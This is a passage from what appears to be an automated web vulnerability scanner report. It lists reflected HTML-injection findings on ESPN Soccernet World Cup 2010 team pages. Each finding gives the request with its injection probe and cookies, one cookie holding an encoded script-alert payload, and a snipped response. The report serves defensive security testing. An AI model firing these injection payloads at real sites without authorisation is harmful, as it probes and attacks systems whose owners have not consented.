espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:31 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:12:31 GMT
Content-Length: 82120
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Australia Football
...[SNIP]...
<a href="/worldcup2010/team?team=628&f41f3"><a>62eb963c13c=1&_slug_=australia&f41f3">
...[SNIP]...
|
2.57. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/656/cameroon |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1812"><a>6cd9474c3cf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroond1812"><a>6cd9474c3cf HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:15 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN34
Cache-Expires: Sat, 06 Nov 2010 23:13:15 GMT
Content-Length: 81962
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cameroon Football /
...[SNIP]...
<a href="/worldcup2010/team?team=656&_slug_=cameroond1812"><a>6cd9474c3cf&topId=801800&linktext=Cameroon+coach+Le+Guen+quits+after+loss">
...[SNIP]...
|
2.58. http://soccernet.espn.go.com/worldcup2010/team/_/team/656/cameroon [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/656/cameroon |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74c3a"><a>f85413ba34c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/656/cameroon?74c3a"><a>f85413ba34c=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:27 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 06 Nov 2010 23:12:27 GMT
Content-Length: 82070
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cameroon Football /
...[SNIP]...
<a href="/worldcup2010/team?team=656&74c3a"><a>f85413ba34c=1&_slug_=cameroon&74c3a">
...[SNIP]...
|
2.59. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/657/nigeria |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cf86"><a>41113cade21 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria2cf86"><a>41113cade21 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN08
Cache-Expires: Sat, 06 Nov 2010 23:33:33 GMT
Content-Length: 81727
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nigeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=657&_slug_=nigeria2cf86"><a>41113cade21&topId=792890&linktext=Nigerian+goverment+won%27t+ban+team">
...[SNIP]...
|
2.60. http://soccernet.espn.go.com/worldcup2010/team/_/team/657/nigeria [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/657/nigeria |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac97"><a>0764b8f72c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/657/nigeria?8ac97"><a>0764b8f72c=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN22
Cache-Expires: Sat, 06 Nov 2010 23:30:13 GMT
Content-Length: 81827
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Nigeria Football /
...[SNIP]...
<a href="/worldcup2010/team?team=657&8ac97"><a>0764b8f72c=1&_slug_=nigeria&8ac97">
...[SNIP]...
|
2.61. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/660/united-states |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac12"><a>f4a7d4b1647 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-statesbac12"><a>f4a7d4b1647 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:34:25 GMT
Content-Length: 82134
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>United States Footb
...[SNIP]...
<a href="/worldcup2010/team?team=660&_slug_=united-statesbac12"><a>f4a7d4b1647&topId=802760&linktext=Ghana+advance+after+beating+USA+2-1">
...[SNIP]...
|
2.62. http://soccernet.espn.go.com/worldcup2010/team/_/team/660/united-states [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/660/united-states |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e57e"><a>f7a6114e7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/660/united-states?3e57e"><a>f7a6114e7ef=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN01
Cache-Expires: Sat, 06 Nov 2010 23:33:55 GMT
Content-Length: 82242
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>United States Footb
...[SNIP]...
<a href="/worldcup2010/team?team=660&3e57e"><a>f7a6114e7ef=1&_slug_=united-states&3e57e">
...[SNIP]...
|
2.63. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/6757/serbia |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70663"><a>50054d97128 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia70663"><a>50054d97128 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:19 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:33:19 GMT
Content-Length: 81915
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Serbia Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=6757&_slug_=serbia70663"><a>50054d97128&topId=797998&linktext=Serbia+coach+Radomir+Antic+wants+to+stay">
...[SNIP]...
|
2.64. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]
previous
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/6757/serbia |
Issue detail
